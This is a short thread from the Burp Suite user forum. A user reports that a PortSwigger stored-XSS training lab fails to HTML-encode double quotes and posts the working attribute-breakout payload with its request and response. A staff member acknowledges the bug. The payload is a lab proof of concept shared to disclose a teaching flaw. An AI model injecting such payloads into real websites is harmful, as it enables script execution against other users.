Burp Suite User Forum

Create new post

(Unintended Solution) for Lab: Stored XSS into anchor href attribute with double quotes HTML-encoded

Eileen | Last updated: Nov 13, 2022 07:16AM UTC

Hi, The lab for teaching XSS that is supposed to encode double quotes did not actually HTML-encode the character ", the following payload works. Relevant Request: website=http%3A%2F%2Ftest"><script>alert()</script> Relevant Response: <a id="author" href="http://test"><script>alert()</script>">aaa

Michelle, PortSwigger Agent | Last updated: Nov 14, 2022 11:41AM UTC

Thanks for getting in touch to let us know about this. We are aware of an issue with this lab currently and are working on an update for it.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.